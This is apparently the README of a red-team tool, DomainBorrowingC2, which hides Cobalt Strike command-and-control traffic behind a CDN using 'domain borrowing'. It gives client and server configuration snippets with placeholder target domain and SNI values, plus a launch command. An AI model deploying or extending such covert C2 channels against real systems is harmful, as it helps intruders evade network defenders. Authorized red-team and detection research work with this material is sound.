Domain Borrowing is a new method to hide C2 traffic using CDN. It was first presented at Blackhat Asia 2021 by Junyu Zhou and Tianze Ding. You can find the presentation slides here and here.
DomainBorrowingC2 was made as part of an internship at NVISO Security's Red Team. Follow their work on their blog and Twitter.
DomainBorrowingC2 is an extension for Cobalt Strike written in C# using Cobalt Strike's External C2 spec. It is based on Ryan Hanson's ExternalC2 library and the Covenant PoC provided in the Blackhat Asia 2021 slides.
I wrote a blogpost about it.
The ClientC2 project is responsible for connecting to the CDN and requesting a stager from ServerC2. It manages communications between Beacon and ServerC2.
Configuration for the client happens in Program.cs
. The client takes 4 parameters:
- domain or ip address to reach the CDN edge server(s)
- the SNI
- OPTIONAL port to communicate with the CDN, default port is 443
- OPTIONAL sleep in milliseconds between messages, default is 60s
Client client = new Client("target.domain.or.ip.address.here", "target.sni.here", 443, 60000);
The ServerC2 project is responsible for relaying communications between the CDN and Cobalt Strike's Teamserver via the ExternalC2 socket.
Configuration for the server happens in SocketSettings.cs
. Specify Cobalt Strike's ExternalC2 listener address and port here.
public SocketSettings()
{
IpAddress = "127.0.0.1";
Port = "2222";
}
Launch the server with: sudo dotnet run --url http://127.0.0.1:80/
. You can customize the IP and port to your liking and configure your CDN appropriately.
- ServerC2 currently depends on ClientC2, so make sure to copy the ClientC2 project before running ServerC2.